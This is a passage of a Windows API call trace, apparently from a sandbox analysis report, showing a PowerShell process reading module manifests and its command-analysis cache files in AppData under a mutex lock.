hTemplateFile=0x0) returned 0x9a0 [0282.304] GetFileType (hFile=0x9a0) returned 0x1 [0282.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.304] GetFileType (hFile=0x9a0) returned 0x1 [0282.304] ReadFile (in: hFile=0x9a0, lpBuffer=0x25b5c76b450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c76b450*, lpNumberOfBytesRead=0x653ef8d338*=0x325, lpOverlapped=0x0) returned 1 [0282.305] ReadFile (in: hFile=0x9a0, lpBuffer=0x25b5c76b450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c76b450*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.305] CloseHandle (hObject=0x9a0) returned 1 [0282.306] ReleaseMutex (hMutex=0x99c) returned 1 [0282.306] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0282.306] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff8c0 [0282.306] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff8c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.306] CoTaskMemFree (pv=0x25b73cff8c0) [0282.306] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01020 [0282.306] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01020 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.306] CoTaskMemFree (pv=0x25b73d01020) [0282.306] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.306] GetCurrentProcess () returned 0xffffffffffffffff [0282.306] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9a0) returned 1 [0282.306] GetTokenInformation (in: TokenHandle=0x9a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.306] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739845f0 [0282.306] GetTokenInformation (in: TokenHandle=0x9a0, TokenInformationClass=0x1, TokenInformation=0x25b739845f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739845f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.307] LocalFree (hMem=0x25b739845f0) returned 0x0 [0282.307] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c76f420, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c76f420*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.307] CreateMutexW (lpMutexAttributes=0x25b5c76f570, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9a4 [0282.307] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9a4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.307] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc3a0 [0282.307] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc3a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.308] CoTaskMemFree (pv=0x25b73cfc3a0) [0282.308] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0282.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.308] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c76fbc0 | out: lpFileInformation=0x25b5c76fbc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644)) returned 1 [0282.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.308] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.308] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.308] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.308] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f5e93b08-2455-4486-a2c2-913fd6c7224d", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f5e93b08-2455-4486-a2c2-913fd6c7224d", lpFilePart=0x0) returned 0x93 [0282.308] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.308] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_f5e93b08-2455-4486-a2c2-913fd6c7224d" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_f5e93b08-2455-4486-a2c2-913fd6c7224d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9a8 [0282.309] GetFileType (hFile=0x9a8) returned 0x1 [0282.309] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.309] GetFileType (hFile=0x9a8) returned 0x1 [0282.310] ReadFile (in: hFile=0x9a8, lpBuffer=0x25b5c770e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c770e48*, lpNumberOfBytesRead=0x653ef8d338*=0x75b, lpOverlapped=0x0) returned 1 [0282.312] ReadFile (in: hFile=0x9a8, lpBuffer=0x25b5c770e48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c770e48*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.312] CloseHandle (hObject=0x9a8) returned 1 [0282.312] ReleaseMutex (hMutex=0x9a4) returned 1 [0282.313] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0282.313] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc3a0 [0282.313] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc3a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.313] CoTaskMemFree (pv=0x25b73cfc3a0) [0282.313] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfac40 [0282.313] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfac40 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.313] CoTaskMemFree (pv=0x25b73cfac40) [0282.313] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.313] GetCurrentProcess () returned 0xffffffffffffffff [0282.313] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9a8) returned 1 [0282.313] GetTokenInformation (in: TokenHandle=0x9a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.313] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984430 [0282.313] GetTokenInformation (in: TokenHandle=0x9a8, TokenInformationClass=0x1, TokenInformation=0x25b73984430, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984430, ReturnLength=0x653ef8d6b8) returned 1 [0282.314] LocalFree (hMem=0x25b73984430) returned 0x0 [0282.314] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c775d70, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c775d70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.314] CreateMutexW (lpMutexAttributes=0x25b5c775ec0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9ac [0282.314] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9ac, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.314] CoTaskMemAlloc (cb=0x20e) returned 0x25b73d007a0 [0282.314] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73d007a0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.314] CoTaskMemFree (pv=0x25b73d007a0) [0282.314] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0282.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.314] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c776518 | out: lpFileInformation=0x25b5c776518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f27d034, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x59c)) returned 1 [0282.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.315] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.315] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.315] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2c1c02cc-4a60-4276-a33a-649882686d1d", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2c1c02cc-4a60-4276-a33a-649882686d1d", lpFilePart=0x0) returned 0x93 [0282.315] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.315] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_2c1c02cc-4a60-4276-a33a-649882686d1d" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_2c1c02cc-4a60-4276-a33a-649882686d1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9b0 [0282.316] GetFileType (hFile=0x9b0) returned 0x1 [0282.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.316] GetFileType (hFile=0x9b0) returned 0x1 [0282.316] ReadFile (in: hFile=0x9b0, lpBuffer=0x25b5c7777b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7777b8*, lpNumberOfBytesRead=0x653ef8d338*=0x518, lpOverlapped=0x0) returned 1 [0282.344] ReadFile (in: hFile=0x9b0, lpBuffer=0x25b5c7777b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c7777b8*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.345] CloseHandle (hObject=0x9b0) returned 1 [0282.345] ReleaseMutex (hMutex=0x9ac) returned 1 [0282.345] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0282.345] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfcc20 [0282.345] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfcc20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.345] CoTaskMemFree (pv=0x25b73cfcc20) [0282.345] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01680 [0282.345] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01680 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.345] CoTaskMemFree (pv=0x25b73d01680) [0282.345] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.345] GetCurrentProcess () returned 0xffffffffffffffff [0282.345] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9b0) returned 1 [0282.345] GetTokenInformation (in: TokenHandle=0x9b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.346] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984370 [0282.346] GetTokenInformation (in: TokenHandle=0x9b0, TokenInformationClass=0x1, TokenInformation=0x25b73984370, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984370, ReturnLength=0x653ef8d6b8) returned 1 [0282.347] LocalFree (hMem=0x25b73984370) returned 0x0 [0282.347] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c77c060, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c77c060*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.347] CreateMutexW (lpMutexAttributes=0x25b5c77c1b0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9b4 [0282.347] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9b4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.347] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfcc20 [0282.347] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfcc20, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.347] CoTaskMemFree (pv=0x25b73cfcc20) [0282.348] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1", lpFilePart=0x0) returned 0x4f [0282.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.348] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c77c808 | out: lpFileInformation=0x25b5c77c808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3771ad5b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3771ad5b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3771ad5b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x699)) returned 1 [0282.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.348] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.348] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_59c47277-42f9-4934-8187-e0b9e2e8ad1d", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_59c47277-42f9-4934-8187-e0b9e2e8ad1d", lpFilePart=0x0) returned 0x93 [0282.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.348] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_59c47277-42f9-4934-8187-e0b9e2e8ad1d" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_59c47277-42f9-4934-8187-e0b9e2e8ad1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9b8 [0282.349] GetFileType (hFile=0x9b8) returned 0x1 [0282.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.349] GetFileType (hFile=0x9b8) returned 0x1 [0282.349] ReadFile (in: hFile=0x9b8, lpBuffer=0x25b5c77daa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c77daa0*, lpNumberOfBytesRead=0x653ef8d338*=0xf2c, lpOverlapped=0x0) returned 1 [0282.353] ReadFile (in: hFile=0x9b8, lpBuffer=0x25b5c77daa0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c77daa0*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.353] CloseHandle (hObject=0x9b8) returned 1 [0282.353] ReleaseMutex (hMutex=0x9b4) returned 1 [0282.353] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0282.353] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cff260 [0282.353] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cff260, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.353] CoTaskMemFree (pv=0x25b73cff260) [0282.353] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d007a0 [0282.353] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d007a0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.353] CoTaskMemFree (pv=0x25b73d007a0) [0282.353] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.354] GetCurrentProcess () returned 0xffffffffffffffff [0282.354] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9b8) returned 1 [0282.354] GetTokenInformation (in: TokenHandle=0x9b8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.354] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739841b0 [0282.354] GetTokenInformation (in: TokenHandle=0x9b8, TokenInformationClass=0x1, TokenInformation=0x25b739841b0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739841b0, ReturnLength=0x653ef8d6b8) returned 1 [0282.355] LocalFree (hMem=0x25b739841b0) returned 0x0 [0282.355] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c784348, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c784348*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.355] CreateMutexW (lpMutexAttributes=0x25b5c784498, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9bc [0282.355] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9bc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.355] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfcc20 [0282.355] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfcc20, 